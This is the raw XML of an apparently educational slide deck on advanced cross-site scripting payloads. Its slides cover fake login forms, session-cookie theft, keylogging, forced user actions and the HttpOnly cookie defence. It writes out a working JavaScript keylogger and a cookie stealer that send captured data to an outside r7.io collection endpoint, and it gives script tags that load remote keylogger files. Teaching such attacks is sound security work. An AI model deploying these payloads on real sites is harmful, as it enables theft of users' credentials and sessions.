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5" r:id="rId5"/>
    <p:sldId id="266" r:id="rId6"/>
    <p:sldId id="264" r:id="rId7"/>
    <p:sldId id="263" r:id="rId8"/>
    <p:sldId id="267" r:id="rId9"/>
    <p:sldId id="259" r:id="rId10"/>
    <p:sldId id="260" r:id="rId11"/>
    <p:sldId id="262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2" d="100"/>
          <a:sy n="162" d="100"/>
        </p:scale>
        <p:origin x="-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49A-4BE4-2C4A-95A2-3CA2D00B80EE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7C3-E3DB-5E42-90FD-F8603EC6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8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49A-4BE4-2C4A-95A2-3CA2D00B80EE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7C3-E3DB-5E42-90FD-F8603EC6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6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49A-4BE4-2C4A-95A2-3CA2D00B80EE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7C3-E3DB-5E42-90FD-F8603EC6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7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49A-4BE4-2C4A-95A2-3CA2D00B80EE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7C3-E3DB-5E42-90FD-F8603EC6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49A-4BE4-2C4A-95A2-3CA2D00B80EE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7C3-E3DB-5E42-90FD-F8603EC6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0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49A-4BE4-2C4A-95A2-3CA2D00B80EE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7C3-E3DB-5E42-90FD-F8603EC6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7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49A-4BE4-2C4A-95A2-3CA2D00B80EE}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/14/16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7C3-E3DB-5E42-90FD-F8603EC6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9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49A-4BE4-2C4A-95A2-3CA2D00B80EE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7C3-E3DB-5E42-90FD-F8603EC6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5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49A-4BE4-2C4A-95A2-3CA2D00B80EE}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/14/16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7C3-E3DB-5E42-90FD-F8603EC6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49A-4BE4-2C4A-95A2-3CA2D00B80EE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7C3-E3DB-5E42-90FD-F8603EC6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6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49A-4BE4-2C4A-95A2-3CA2D00B80EE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7C3-E3DB-5E42-90FD-F8603EC6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0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4649A-4BE4-2C4A-95A2-3CA2D00B80EE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397C3-E3DB-5E42-90FD-F8603EC6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0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7.io/exfil_create" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://r7.io/e/%5Btoken%5D?s=%5Bdata%5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3164" y="2729690"/>
            <a:ext cx="5775036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1300" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>       ▒██   ██▒  ██████   ██████                                                 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>       ▒▒ █ █ ▒░▒██    ▒ ▒██    ▒                                                 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>       ░░  █   ░░ ▓██▄   ░ ▓██▄                                                   </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        ░ █ █ ▒   ▒   ██▒  ▒   ██▒                                                </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>       ▒██▒ ▒██▒▒██████▒▒▒██████▒▒                                                </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>       ▒▒ ░ ░▓ ░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░                                                </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>       ░░   ░▒ ░░ ░▒  ░ ░░ ░▒  ░ ░                                                </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        ░    ░  ░  ░  ░  ░  ░  ░                                                  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        ░    ░        ░        ░                                                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t/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                                                                      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▄▄▄      ▓█████▄  ██▒   █▓ ▄▄▄       ███▄    █  ▄████▄  ▓█████ ▓█████▄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▒████▄    ▒██▀ ██▌▓██░   █▒▒████▄     ██ ▀█   █ ▒██▀ ▀█  ▓█   ▀ ▒██▀ ██▌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▒██  ▀█▄  ░██   █▌ ▓██  █▒░▒██  ▀█▄  ▓██  ▀█ ██▒▒▓█    ▄ ▒███   ░██   █▌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░██▄▄▄▄██ ░▓█▄   ▌  ▒██ █░░░██▄▄▄▄██ ▓██▒  ▐▌██▒▒▓▓▄ ▄██▒▒▓█  ▄ ░▓█▄   ▌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▓█   ▓██▒░▒████▓    ▒▀█░   ▓█   ▓██▒▒██░   ▓██░▒ ▓███▀ ░░▒████▒░▒████▓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▒▒   ▓▒█░ ▒▒▓  ▒    ░ ▐░   ▒▒   ▓▒█░░ ▒░   ▒ ▒ ░ ░▒ ▒  ░░░ ▒░ ░ ▒▒▓  ▒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 ▒   ▒▒ ░ ░ ▒  ▒    ░ ░░    ▒   ▒▒ ░░ ░░   ░ ▒░  ░  ▒    ░ ░  ░ ░ ▒  ▒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 ░   ▒    ░ ░  ░      ░░    ░   ▒      ░   ░ ░ ░           ░    ░ ░  ░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     ░  ░   ░          ░        ░  ░         ░ ░ ░         ░  ░   ░   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          ░           ░                        ░                ░     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██▓███   ▄▄▄     ▓██   ██▓ ██▓     ▒█████   ▄▄▄      ▓█████▄   ██████ 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▓██░  ██▒▒████▄    ▒██  ██▒▓██▒    ▒██▒  ██▒▒████▄    ▒██▀ ██▌▒██    ▒ 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▓██░ ██▓▒▒██  ▀█▄   ▒██ ██░▒██░    ▒██░  ██▒▒██  ▀█▄  ░██   █▌░ ▓██▄   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▒██▄█▓▒ ▒░██▄▄▄▄██  ░ ▐██▓░▒██░    ▒██   ██░░██▄▄▄▄██ ░▓█▄   ▌  ▒   ██▒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▒██▒ ░  ░ ▓█   ▓██▒ ░ ██▒▓░░██████▒░ ████▓▒░ ▓█   ▓██▒░▒████▓ ▒██████▒▒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▒▓▒░ ░  ░ ▒▒   ▓▒█░  ██▒▒▒ ░ ▒░▓  ░░ ▒░▒░▒░  ▒▒   ▓▒█░ ▒▒▓  ▒ ▒ ▒▓▒ ▒ ░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░▒ ░       ▒   ▒▒ ░▓██ ░▒░ ░ ░ ▒  ░  ░ ▒ ▒░   ▒   ▒▒ ░ ░ ▒  ▒ ░ ░▒  ░ ░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░░         ░   ▒   ▒ ▒ ░░    ░ ░   ░ ░ ░ ▒    ░   ▒    ░ ░  ░ ░  ░  ░  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              ░  ░░ ░         ░  ░    ░ ░        ░  ░   ░          ░  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                  ░ ░                                 ░ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="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7185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Login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can be used to build a fake login form on the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript can be used to redirect someone to your server hosting the fake login page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If the XSS is on the login page then simply change where the form submits to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can you think of any improvements to these ideas?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7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54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&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1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var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keys = '';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  <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>document.onkeypress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = function(e) {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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> get = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>window.event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> ? event : e;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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> key = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>get.keyCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> ? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>get.keyCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>get.charCode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    key = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(key);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    keys += key;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  <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>window.setInterval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(function(){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    new Image().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = 'http:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/r7.io/k/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>c=' + keys;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    keys = '';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}, 1000)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&lt;/script&gt;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Demo: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	- &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="http://xss-challenges.r7.io/static/keylogger0.js"&gt;&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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	- &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="http://xss-challenges.r7.io/static/keylogger1.js"&gt;&lt;/script&gt;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Source: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smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>- http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>wiremask.eu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xss-keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas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3379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Stealing passwords from a password manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client-side browser exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BeEF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Fingerprinting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4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you have script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the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>weaponizing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> phase begins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Identify the assets you want to get access to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Identify the interactions you want to force the user to perform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most common attacks are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Exfiltrating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data and/or cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inducing user interactions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fake login forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Keylogging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Exfiltrating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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user’s session cookie is like their ID badge, authenticating their requests to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If the session cookie can be stolen then the thief can impersonate the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies can be accessed via JavaScript call to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If an outbound request can be made containing the contents of the cookies then the server receiving the request has the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5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"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://r7.io/exfil_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> to get a token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://r7.io/e/[token]?s=[data]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smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to save the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>exfiltrated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://r7.io/e/[token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> to access the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>exfiltrated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> data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>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>script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i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new Image(); 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i.src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>='http://r7.io/e/LYddhj5f8X?s='+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.cookie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>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="343850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Session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sidejacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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219264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HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Informs the browser that JavaScript should not be able to access to the cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser enforced protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Set when the cookie is set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0" smtClean="0"/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HTTP/1.1 200 OK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Cache-Control: private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Content-Type: text/html; charset=utf-8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Content-Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>gzip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty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Vary: Accept-Encoding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Server: Microsoft-IIS/7.0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Set-Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ASP.NET_SessionId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=ig2fac55; path=/; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r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X-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>AspNet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-Version: 2.0.50727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Set-Cookie: user=t=bfabf0b1c1133a822; path=/; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r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X-Powered-By: ASP.NET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Date: Tue, 26 Aug 2008 10:51:08 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>GMT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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0777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Exfiltrating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> User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principles as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>exfiltrating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Grab something from the current page and send it to the remote server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Grab something from another page via AJAX call and send it to the remote server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HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> protections for regular data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Anything the user can access without password re-prompt is accessible to the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6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you think of some things worth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>exfiltrating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> from sites you commonly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7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Unintended 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requests coming from the same domain and with a valid session from the victim user you can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Delete accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Purchase things</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Add/remove friends</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Grant/deny access/permissions to other users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can you think of anything else</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="244720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607</Words>
